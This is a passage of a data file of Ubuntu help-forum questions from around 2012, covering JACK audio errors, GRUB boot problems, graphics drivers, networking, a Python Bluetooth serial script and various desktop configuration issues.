'firewire_pcm:00130e0401400d6b_ip 3_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_ip 4_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_ip 5_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_ip 6_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_ip 7_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_ip 8_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_spdif l_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_spdif r_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_midi 0_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 1_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 2_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 3_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 4_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 5_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 6_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 7_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 8_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_loop 1_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_loop 2_in' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_mon 1_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_mon 2_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 3_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 4_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 5_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 6_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 7_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 8_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 9_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_line 10_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_spdif l_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_spdif r_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_midi 0_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 1_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 2_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 3_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 4_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 5_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 6_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 7_out' sun mar 18 19:30:46 2012 : graph reorder : new port 'firewire_pcm:00130e0401400d6b_adat 8_out' 19:30:48.759 jack connection change . 19:30:48.761 server configuration saved to `` /home/richard/.jackdrc '' . 19:30:48.765 statistics reset . 19:30:48.775 client activated . 19:30:48.780 jack connection graph change . can not lock down memory area ( can not allocate memory ) sun mar 18 19:30:48 2012 : new client 'qjackctl ' with pid 2138 19:33:24.467 xrun callback ( 1 ) . 19:37:36.111 xrun callback ( 2 ) . 19:38:08.115 xrun callback ( 3 ) . 19:38:42.392 xrun callback ( 4 ) . 19:38:49.831 xrun callback ( 5 ) . 19:39:13.111 xrun callback ( 6 ) . 19:43:01.703 xrun callback ( 7 ) . i tried lots of different memory settings because log say it ca n't get a lock . also server wont start with realtime option ticked . after server start , the system get unstable . if i try to stop the server , fw active led on the card shutoff as it should then qjackctrl freeze . any input is very appreciated !
114121	newest ubuntu on weak asus	i have some question . this would be my first time with ubuntu , i bought some cheap notebook asus k50c-sx002 . can i use newest ubuntu on that notebook without any problems ? maybe my notebook is too weak for that newest release of ubuntu ? can you help me ? peter .
114122	is there a way to disable sound in one program ?	is there a way for me to be able to enable sound in one program ( say , vlc ) and at the same time disable sound in another program ( say , chrome ) . i am not using these programs in particular . the question is in general .
114123	how can i create a menu entry for grub which boots ubuntu in console mode ?	it would be easier if i can keep an in grub menu to boot between gui and console . i do n't want x to start sometimes.does grub support that kind of feature ?
114127	java 6 plugin not working .	i ca n't get the java 6 plugin working . after i run : sudo apt-get install sun-java6-plugin and i restart firefox i go to tools > add ons > plugins and the java 6 plugin is not showing up .
114129	setting desktop background with gconftool-2	gconftool-2 -- type string -- set /desktop/gnome/background/picture_filename /path/file.jpg does n't work . it changes the variable but the background does n't change . gconftool-2 -- get /desktop/gnome/background/picture_filename outputs the file that i set for desktop background . any ideas ?
114130	how do i install the intel hd graphics driver for a pentium p6200 cpu ?	i have a pentium p6200 cpu with integrated intel hd graphics on ubuntu 11.10 . how do i install a driver ... 3d games under wine run really slow .
114132	how to overwrite ubuntu with windows 7 ?	so i have a windows dvd and it works . but when it gets to the part when it says `` upgrade '' or `` custom '' i click on custom and at the bottom it says can not install over it because windows 7 can only be installed on an ntfs drive ? i know that ubuntu formatted my partitions into one big on that 's an ext4 . what can i do ? i know that i can maybe create a 30-50 gb partition that 's an ntfs then when i go into windows i can format the ubuntu one and combine them but i do n't know how to make a partition much less make a big partition in the `` gparted '' program ? so any ideas would be very helpful . i know how to do anything with a hard drive using the default program that comes with windows 7 but i feel like a mouse in a maze when i open gparted .
114133	wired connection problem through router	i 'm having trouble to connect my ubuntu 11.10 to internet through ethernet . i installed a router to get wi-fi and now ( by a wired connection ) i ca n't have internet with ubuntu ( but i can with windows 7 ) . i see several attempts per minute of the network-manager to get a connection , but after a minute it stops trying . here are a couple of outputs from key files : cat /etc/network/interfaces auto lo iface lo inet loopback and ifconfig -a eth0 link encap : ethernet hwaddr 00:16:76 : e4 : a6 : e8 inet6 addr : fe80 : :216:76ff : fee4 : a6e8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:117 dropped:0 overruns:0 frame:117 tx packets:50 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:12221 ( 12.2 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:582 errors:0 dropped:0 overruns:0 frame:0 tx packets:582 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:46024 ( 46.0 kb ) tx bytes:46024 ( 46.0 kb ) i tried reconnecting the modem and the router and reconnecting the ethernet cable but nothing ... i tried other solutions from other posts ( this one has a similar issue wired connection not working ) but again nothing . my ip is dynamic . a couple of things i see and did : i see no inet addr , only inet6 . i ignored ipv6 from the internet connections , and restarted the network-manager service and nothing . a difference with the post i mentioned is the rx packets with errors i have , is this a clue of the problem ? any help would be appreciated , thanks !
114139	how can i make window titlebars black like the gnome shell top panel ?	i have recently installed gnome 3.2 and i would like that the title bars on every program had the same color as the black toolbar that gnome has , because i have the ambiance title bars and i do n't like it . i 've looked everywhere but i did n't find any way . does anyone know how to do it ? thank you
114151	thunderbird syncs all folders	why does thunderbird sync all folders ? while i prefer thunderbird to evolution , the out of the box setting is inverted for me -- evolution never did that . in thunderbird , i had to manually unclick many , many , many folders . in particular , the [ gmail ] folders , which hold the `` all mail '' directory , and so forth .
114155	how can i prevent nautilus from running when i plug in a usb stick ?	i run xfce4 on ubuntu 11.10 . when i plug in a usb memory stick , i get two new windows popping up , both showing the contents of the memory stick . one is thunar ( which i want ) and one is nautilus ( which i do n't ) . before i plug in the stick , nautilus is n't running at all . something is spawning it , but i do n't know what , or how to stop it . this is what the nautilus- > edit- > preferences dialog looks like . there 's no media tab :
114159	i ca n't get a native resolution of 1920x1080 on 11.10 ( aoc f22 on a nvidia geforce gts 450 )	i have a problem were the highest resolution i can get is 1360x769 , this is a 22 inch lcd monitor with a native resolution of 1920x1080_60 i have tried numerous drivers but nothing changed i tried editing the xorg.conf scipt with no success ( i am a noob with linux though ) . running many commands in terminal witch i got from people with similar problems only gives me errors like `` failed to get size of gamma for output default . i get edid checksum is invalid error on boot down also . i think there maybe a communication problem between my screens edid and ubuntu although xp and windows 7 detect my screen without any errors and automatically set native resolution . also when i am installing ubuntu i get a horrible screen flashing every few seconds until i have installed the nvidia driver . pc specks if it helps x64 os , mainboard n68pv-gs , 4 gig ram , amd phenom ( tm ) 9350e quad-core processor ă 4 , nvidia geforce gts450 512mb , hard drives set up in a onboard nvidia raid array striped . realy need to get a better resolution , 1360x769 does not look nice on a 22 inch screen . ty
114162	how to set up language input ?	i 'm trying to set up kubuntu 11.10 so i can type japanese . i 've searched online but have had little luck . my installation is fresh so it 'd be great if someone could walk me through it and tell me how to do it from the beginning .
114165	rsync - gvfs - questions	i 've noticed some issues with rsync and .gvfs over the years . typically i just -- exclude=.gvfs in my rsync command and call it a day . recently i decided to read the rsync man page top to bottom left to right . after all , what better way to learn ? man pages are quicker than googling , if you ask me . i had noticed the -x flag , which was cited to not cross other file systems . i began to wonder what exactly that meant and thought ... would -x also ignore .gvfs , being a virtual file system ? that said , would : rsync -a -- exclude=.gvfs /home/jason /media/externalhdd ( be kind of the same as ) rsync -ax /home/jason /media/externalhdd ? ? ? ?
114166	broadcom corporation netlink bcm57785 gigabit ethernet pcie driver tg3 will not install ?	aries @ aries-laptop : ~ $ sudo ifconfig eth0 up eth0 : error while getting interface flags : no such device aries @ aries-laptop : ~ $ lspci -nn 00:00.0 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1705 ] 00:01.0 vga compatible controller [ 0300 ] : ati technologies inc device [ 1002:9641 ] 00:01.1 audio device [ 0403 ] : ati technologies inc device [ 1002:1714 ] 00:04.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:1709 ] 00:06.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:170b ] 00:11.0 sata controller [ 0106 ] : advanced micro devices [ amd ] device [ 1022:7800 ] ( rev 40 ) 00:12.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7807 ] ( rev 11 ) 00:12.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7808 ] ( rev 11 ) 00:13.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7807 ] ( rev 11 ) 00:13.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7808 ] ( rev 11 ) 00:14.0 smbus [ 0c05 ] : advanced micro devices [ amd ] device [ 1022:780b ] ( rev 13 ) 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] device [ 1022:780d ] ( rev 01 ) 00:14.3 isa bridge [ 0601 ] : advanced micro devices [ amd ] device [ 1022:780e ] ( rev 11 ) 00:14.4 pci bridge [ 0604 ] : advanced micro devices [ amd ] device [ 1022:780f ] ( rev 40 ) 00:16.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7807 ] ( rev 11 ) 00:16.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] device [ 1022:7808 ] ( rev 11 ) 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1700 ] ( rev 43 ) 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1701 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1702 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1703 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1704 ] 00:18.5 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1718 ] 00:18.6 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1716 ] 00:18.7 host bridge [ 0600 ] : advanced micro devices [ amd ] device [ 1022:1719 ] 01:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm57785 gigabit ethernet pcie [ 14e4:16b5 ] ( rev 10 ) 01:00.1 sd host controller [ 0805 ] : broadcom corporation device [ 14e4:16bc ] ( rev 10 ) 01:00.2 system peripheral [ 0880 ] : broadcom corporation device [ 14e4:16be ] ( rev 10 ) 01:00.3 system peripheral [ 0880 ] : broadcom corporation device [ 14e4:16bf ] ( rev 10 ) 02:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4358 ]
114171	why is /dev/rfcomm0 giving pyserial problems ?	i am connecting my ubuntu box to a wireless readout setup over bluetooth . i wrote a python script to send the serial information through /dev/rfcomm0 . the script connects fine and works for a few minutes , but then python will start using 100 % cpu and the messages stop flowing through . i can open rfcomm0 in a serial terminal and communicate through it by hand just fine . when i open it through a terminal it seems to work indefinitely . also , i can swap the bluetooth receiver for a usb cable , and change the port to /dev/ttyusb0 , and i do n't get any problems over time . it seems either i 'm doing something wrong with rfcomm0 or pyserial does n't handle it well . here 's the script : import psutil import serial import string import time sampletime = 1 numsamples = 5 lasttemp = 0 temp_char = 't' usage_char = 'u' sensor_name = 'tc0d' gauges = serial.serial ( ) gauges.port = '/dev/rfcomm0' gauges.baudrate = 9600 gauges.parity = 'n' gauges.writetimeout = 0 gauges.open ( ) print ( `` connected to `` + gauges.portstr ) filename = '/sys/bus/platform/devices/applesmc.768/temp2_input' def parsesensorsoutputlinux ( output ) : return int ( round ( float ( output ) / 1000 ) ) while ( 1 ) : usage = psutil.cpu_percent ( interval=sampletime ) gauges.write ( usage_char ) gauges.write ( chr ( int ( usage ) ) ) # write the first byte # print ( `` wrote usage : `` + str ( int ( usage ) ) ) sensorfile = open ( filename ) temp = parsesensorsoutputlinux ( sensorfile.read ( ) ) gauges.write ( temp_char ) gauges.write ( chr ( temp ) ) # print ( `` wrote temp : `` + str ( temp ) ) any thoughts ? thanks . edit : here is the revised code , using python-bluez instead of pyserial : import psutil import serial import string import time import bluetooth sampletime = 1 numsamples = 5 lasttemp = 0 temp_char = 't' usage_char = 'u' sensor_name = 'tc0d' # gauges = serial.serial ( ) # gauges.port = '/dev/rfcomm0' # gauges.baudrate = 9600 # gauges.parity = 'n' # gauges.writetimeout = 0 # gauges.open ( ) gaugesocket = bluetooth.bluetoothsocket ( bluetooth.rfcomm ) gaugesocket.connect ( ( '00:06:66:42:22:96 ' , 1 ) ) filename = '/sys/bus/platform/devices/applesmc.768/temp2_input' def parsesensorsoutputlinux ( output ) : return int ( round ( float ( output ) / 1000 ) ) while ( 1 ) : usage = psutil.cpu_percent ( interval=sampletime ) # gauges.write ( usage_char ) gaugesocket.send ( usage_char ) # gauges.write ( chr ( int ( usage ) ) ) # write the first byte gaugesocket.send ( chr ( int ( usage ) ) ) # print ( `` wrote usage : `` + str ( int ( usage ) ) ) sensorfile = open ( filename ) temp = parsesensorsoutputlinux ( sensorfile.read ( ) ) # gauges.write ( temp_char ) gaugesocket.send ( temp_char ) # gauges.write ( chr ( temp ) ) gaugesocket.send ( chr ( temp ) ) # print ( `` wrote temp : `` + str ( temp ) ) it seems either ubuntu must be closing /dev/rfcomm0 after a certain time or my bluetooth receiver is messing things up . even when the bluetootherror arises , the `` connected '' light on the receiver stays illuminated , and it is not until i power-cycle to receiver that i can reconnect . i 'm not sure how to approach this problem . it 's odd that the connection would work fine for a few minutes ( seemingly a random amount of time ) and then seize up . in case it helps , the bluetooth receiver is a bluesmirf silver from sparkfun . do i need to be trying to maintain the connection from the receiver end or something ?
114176	ubuntu 11.10 , ff 11 , ati catalyst v12.2 , driver package version 8.95 , webgl does n't work	i 'm running ubuntu 11.10 , ff 11 , ati catalyst v12.2 , driver package version 8.95 , webgl does n't work . this is a pretty capable setup and definetly did have ff work previously , note : i 've downloaded and installed the ati drivers from amd . not sure how to get webgl working . updated my video card info : 01:00.0 vga compatible controller : ati technologies inc cypress [ radeon hd 5800 series ] ( prog-if 00 [ vga controller ] ) subsystem : ati technologies inc device 0b00 flags : bus master , fast devsel , latency 0 , irq 44 memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fbee0000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at d000 [ size=256 ] expansion rom at fbec0000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 3 capabilities : [ 58 ] express legacy endpoint , msi 00 capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 100 ] vendor specific information : id=0001 rev=1 len=010 < ? > capabilities : [ 150 ] advanced error reporting kernel driver in use : fglrx_pci kernel modules : fglrx , radeon
114178	accedently removed ia32-libs and now gui not working in ubuntu 10.04	i have removed accidently i32-libs . now the gui is not properly working . how can i fix it ?
114179	grub2 wo n't detect ubuntu 11.10 os after reinstalling win xp hal.dll .	hi i 'm an ubuntu newbie here . i 've installed ubuntu 11.10 to dual boot on a single hdd . i did a manual partition and basically forgot all the on what sda my /boot partition is . my installation worked out just fine and i tried to install updates with it . after a while i when i wanted to boot to windows it showed that i was missing a `` hal.dll '' file . i 've fixed this problem using the windows resource cd but then after booting up my pc it went straight to windows xp . i 've tried to manually reinstall grub2 using a live cd/usb and it worked but i think i have installed in on a different `` sda # '' ( sda5 to be exact ) because even though grub2 loads when i boot my pc , only windows xp shows up as my os and ubuntu 11.10 is missing . now , i 've tried installing boot-repair to solve my problems using live cd/usb . boot-repair tells me that boot configuration was successful but then a basic grub interface shows up ( the black one with a command line grub > showing up . now i ca n't even boot to windows xp . any help would be really appreciated . btw here 's the notes from boot repair that i was asked to save : http : //paste.ubuntu.com/890228/ as you can see there are boot files on sda5 and sda7 . i think that 's the core problem that i have right now . thanks in advance !
114184	how to backup and restore empathy accounts and password in ubuntu 12.04 ?	there is no documentation on how to backup and then restore your empathy accounts . the other thread is very vague and does not help
114188	how to access favorites in gnome-shell with keyboard ?	in unity , i can press super+1 , super+2 and so on to access favorites . what is the key-shortcut in gnome-shell and where can i customize it ? edit : i mean favorites in activities menu ( after bringing mouse to top-left of the screen or pressing super )
114192	remastersys created live dvd hangs in `` choose a picture ''	i used remastersys to create a live dvd . then , i used the live dvd for the installation on another computer . the installation hung at the `` choose a picture '' session . both the `` back '' and `` continue '' buttons were disabled . it seemed like the installation was hung . i had to power-cycle the computer and reinstall from the live dvd again . after the power-cycle , the installation from the live dvd went successfully . any idea why the installation hung at the `` choose a picture '' session , and how to fix it without power-cycle the computer ? thanks a lot !
114196	-le comparison problem in bash script	i 'm under ubuntu 11.10 , when i execute this program in bash i have the following error : exec.bash : line 25 : [ : 0.1 : integer expected as an expression line 25 is : while [ $ p -le 1.0 ] in the following context p=0.1 while [ $ p -le 1.0 ] do echo -- -- probability -- -- $ p java $ jvmargs -classpath $ cp jbenchmarker.mainsimulation $ p ( ( p= $ p + 0.1 ) ) done where is the problem ?
114197	center the newly created text in gimp ?	after creating a text , how can i center it ? i 'm not talking about the text alignment inside the text box . thanks
114206	how do you xforward windows using ssh ?	how do you use xforwarding through ssh beetween two ubuntu pc 's ?
114211	lubuntu - remap keys without logout	to remap keys under lubuntu , i need to modify lxde-rc.xml file and next time i login , i should have the new key configuration ( as written here ) can i reload the new key configuration without logging out ?
114213	user script at logout	the problem : i 'm sharing a directory with my wife . i 've placed us both in a 'shared ' group and the directory belongs to the 'shared ' group as well . whenever one of us creates a file , this file belongs to user : user , instead of user : shared ... the solution : i can do sudo chown , but my wife ca n't . so , i want to run a script when i logout of the session . if i understand correctly , the startup scripts go in /etc/init.d/ and the runlevel scripts go /etc/rc0.d/ where 0 is the runlevel ( 0-6 ) . questions : do the runlevel scripts execute only on exit/logout ? do these depend on the user , that is , i 'd like to run it only for my user ( not so important in this case , mind ) ? which runlevel should i choose ( my guess is 5 ) ? should i place the script somewhere else ? also , i imagine that the script will be run by root , so there 's no need for sudo within the script , is that correct ?
114216	can not find vlc web plugin while compiling vlc 2.0 from source	i compiled vlc 2.0.0 on ubuntu 11.10 successfully , however i could n't find the vlc web plugin for playback of video from html . in referring to http : //www.videolan.org/doc/vlc-user-guide/en/ch07.html i configured , compiled and installed vlc with the following commands : ./configure -- enable-mozilla make su password : [ root password ] make install i downloaded the vlc source code from here http : //www.videolan.org/vlc/download-sources.html . so , the question is , where is vlc web plugin in vlc 2.0 ?
114221	how do i get the required mp3 and mp4 codecs without an internet connection ?	i use ubuntu 11.10 without the internet and i want to play the mp3 songs and mp4 movies . how can i do this ?
114226	u1 music mp3 files not put into albums	via the web page i can see that my files sync to u1 cloud servers . for the mp3 files , there seems to be a problem that several questions have already addressed but there does not seem to be a clear answer . if i use easytag 2.1.6 , i can see the id3 tags on the local files and they seem to correctly define the artist , album title and track name . i expect it is not relevant , but i am using 10.04 with several different clients to rip the cds . however , some mp3 files do not appear in the cloud at all and some others get assigned to various artist or unknown artist . does the music streaming ( e.g . via ipad ) use the tags or the directory/file structure to assign the artist or album , and how quickly should it be expected to work ? : - ) which version of id3 tags does u1 music streaming work best with or prefer ? thanks for any help david
114227	shell prompt customization ?	i have used oh_my_zsh ( and tinkered with bash_it ) on multiple systems and have generally been happy with it , though i hate it 's auto-correction feature and generally turn it off . my usual shell is zsh and i really want just three things from my prompt : current directory/or pwd . git status and branch . color output from ls ( on the ls command , not in the prompt ) . the rest is just bling and is often irritating . by using these shell scripts i am paying too much in cpu cycles for what i want . any suggestions , either with using these scripts or as a separate shell script . i am ok with either zsh or bash .
114232	will there be a mac version of ubuntu one ?	will there be a mac version of ubuntu one for syncing between desktop and other devices , or is it only through a browser ?
114235	formatted ubuntu partition & now grub says `` error : no such partition '' - ca n't enter windows	i had installed ubuntu ( current version : 11.xx ) alongside windows vista . now i formatted the ubuntu partition & merged it with another partition ( without thinking , obviously ) . now , when i restart the computer , grub probably tries to find the old partition ( which does no longer exist ) and says : error : no such partition . grub rescue > now i dont know what to do ( i 'm a total beginner ) . i tried to re-install ubuntu on the newly formatted partition but this wo n't work , because after removing the install-usb ( which i am said to do during installation ) i find the above error-message again . i guess i need some way to reconfigure grub or to reinstall grub/ubuntu ( on the newly formatted partition ) or to reinstall the windows boot manager ( without reinstall . windows ) , but i have no idea how to do either of these things .
114236	scrabble game for ubuntu ?	i have a friend who is running ubuntu . he has a scrabble computer game that he wants to install . he got it out of a cereal box , but he likes it and wants to play it anyways . where could he look for the game ?
114240	initrd.lz is corrupted error occured while installing 11.10	c : \ubuntu\install\boot\initrd.lz is corrupted . error pop-up comes up every time i am trying to install ubuntu-11.10-desktop-i386 using wubi . error comes when the installation process is almost completed . can anyone suggest a solution for this problem . its occurring regularly . 03-19 18:01 debug tasklist : # # running copy_installation_files ... 03-19 18:01 debug windowsbackend : copying c : \docume~1\hp_own~1.you\locals~1\temp\pyl59.tmp\data\custom-installation - > c : \ubuntu\install\custom-installation 03-19 18:01 debug windowsbackend : copying c : \docume~1\hp_own~1.you\locals~1\temp\pyl59.tmp\winboot - > c : \ubuntu\winboot 03-19 18:01 debug windowsbackend : copying c : \docume~1\hp_own~1.you\locals~1\temp\pyl59.tmp\data\images\ubuntu.ico - > c : \ubuntu\ubuntu.ico 03-19 18:01 debug tasklist : # # finished copy_installation_files 03-19 18:01 debug tasklist : # # running get_iso ... 03-19 18:01 debug commonbackend : trying to use pre-specified iso x : \ubuntu-11.10-desktop-i386.iso 03-19 18:01 debug tasklist : new task is_valid_iso 03-19 18:01 debug tasklist : # # # running is_valid_iso ... 03-19 18:01 debug distro : checking ubuntu iso x : \ubuntu-11.10-desktop-i386.iso 03-19 18:01 info distro : found a valid iso for ubuntu : x : \ubuntu-11.10-desktop-i386.iso 03-19 18:01 debug tasklist : # # # finished is_valid_iso 03-19 18:01 debug tasklist : new task check_iso 03-19 18:01 debug tasklist : # # # running check_iso ... 03-19 18:01 debug commonbackend : checking x : \ubuntu-11.10-desktop-i386.iso 03-19 18:01 debug distro : checking ubuntu iso x : \ubuntu-11.10-desktop-i386.iso 03-19 18:01 info distro : found a valid iso for ubuntu : x : \ubuntu-11.10-desktop-i386.iso 03-19 18:01 debug commonbackend : using distro ubuntu i386 instead of ubuntu amd64 03-19 18:01 debug tasklist : new task get_metalink 03-19 18:01 debug tasklist : # # # # running get_metalink ... 03-19 18:01 debug downloader : downloading http : //releases.ubuntu.com/11.10/ubuntu-11.10-desktop-i386.metalink > c : \ubuntu\install 03-19 18:01 error commonbackend : can not download metalink file http : //releases.ubuntu.com/11.10/ubuntu-11.10-desktop-i386.metalink err= [ errno 4 ] ioerror : < urlopen error ( 7 , 'getaddrinfo failed ' ) > 03-19 18:01 debug downloader : downloading http : //cdimage.ubuntu.com/daily-live/current/oneiric-desktop-i386.metalink > c : \ubuntu\install 03-19 18:01 error commonbackend : can not download metalink file2 http : //cdimage.ubuntu.com/daily-live/current/oneiric-desktop-i386.metalink err= [ errno 4 ] ioerror : < urlopen error ( 7 , 'getaddrinfo failed ' ) > 03-19 18:01 debug tasklist : # # # # finished get_metalink 03-19 18:01 error commonbackend : error : the metalink file is not available , can not check the md5 for x : \ubuntu-11.10-desktop-i386.iso , ignoring 03-19 18:01 debug tasklist : # # # finished check_iso 03-19 18:01 debug tasklist : new task copy_file 03-19 18:01 debug commonbackend : copying x : \ubuntu-11.10-desktop-i386.iso > c : \ubuntu\install\installation.iso 03-19 18:01 debug tasklist : # # # running copy_file ... 03-19 18:01 debug tasklist : # # # finished copy_file 03-19 18:01 debug tasklist : # # finished get_iso 03-19 18:01 debug tasklist : # # running extract_kernel ... 03-19 18:01 debug commonbackend : extracting files from iso c : \ubuntu\install\installation.iso 03-19 18:01 debug windowsbackend : extracting md5sum.txt from c : \ubuntu\install\installation.iso 03-19 18:01 debug windowsbackend : extracting casper\vmlinuz from c : \ubuntu\install\installation.iso 03-19 18:01 debug windowsbackend : extracting casper\initrd.lz from c : \ubuntu\install\installation.iso 03-19 18:01 debug commonbackend : checking kernel , initrd and md5sums 03-19 18:01 debug commonbackend : checking c : \ubuntu\install\boot\vmlinuz 03-19 18:01 debug commonbackend : c : \ubuntu\install\boot\vmlinuz md5 = fde150f5c6fd2de66ed7876efbfcc4c7 == fde150f5c6fd2de66ed7876efbfcc4c7 03-19 18:01 debug commonbackend : checking c : \ubuntu\install\boot\initrd.lz 03-19 18:01 debug commonbackend : c : \ubuntu\install\boot\initrd.lz md5 = 8900200c764438c1b124dff5ae92c763 ! = d6baee1e11f1d6de6eba6bd43dbde352 03-19 18:01 error tasklist : file c : \ubuntu\install\boot\initrd.lz is corrupted traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 623 , in extract_kernel exception : file c : \ubuntu\install\boot\initrd.lz is corrupted 03-19 18:01 debug tasklist : # cancelling tasklist 03-19 18:01 error root : file c : \ubuntu\install\boot\initrd.lz is corrupted traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 623 , in extract_kernel exception : file c : \ubuntu\install\boot\initrd.lz is corrupted 03-19 18:01 debug tasklist : # finished tasklist
114245	how do i get picasa 3.9 to play .mov files ?	i have been using picasa for years , first in xp then in ubuntu from 8.04 onwards & now in lubuntu 11.10 . for 11.10 , i downloaded picasa3.9.0 from filehippo & installed it in wine . everything works well , except it does n't play videos from my camera - it just shows a thumbnail - whereas earlier versions played videos ok . the videos appear as **.mov ( quicktime video ) in file manager , & can be played by , for instance , gnome mplayer or movie player ( but not properly by banshee ... ) . is there some simple way of getting picasa 3.9 to play them ?
114247	is there any need to install nvidia graphics drivers if i am running ubuntu server ?	i have googled this question and arrived at no answer , so here i am . if i am going to be running ubuntu server , ( as before i was running 10.04 desktop ) is there any need to install the nvidia drivers using , say , 'wget ' ? i ask this because i am unaware if the drivers only impact the gui or do they allow for power saving features that the computer could benefit from ? thanks and regards : )
114249	libreoffice can not save documents on shared ssh drive - all other applications can	i 'm having a problem with libre office ( all the applications ) . i can not save a file to any networked drive ( using ssh to network ) . i keep getting a message that i do not have the necessary user rights to save the file ( even if the share is created by root ) . i have no problems with any other applications writing to other network drives . i 'm running ubuntu 11.10-64
114253	ubuntu daily build for ( x86 - 64bit ) arch	where can i find ubuntu 12.04 daily build for intel x86 - 64 bit arch ? i can see amd 64 bit in here , ubuntu daily . but will it work with intel x86 64 bit architectures ?
114259	minimising windows problem	i 'm new to linux . i 'm using ubuntu 11.04 and gnome classic . i 'm using the old ubuntu desktop , not the new one that came with 11.04 . can anybody tell me how to get minimised windows in the system tray ? every time i minimise a window it just disappears and i have to use alt+tab every time .
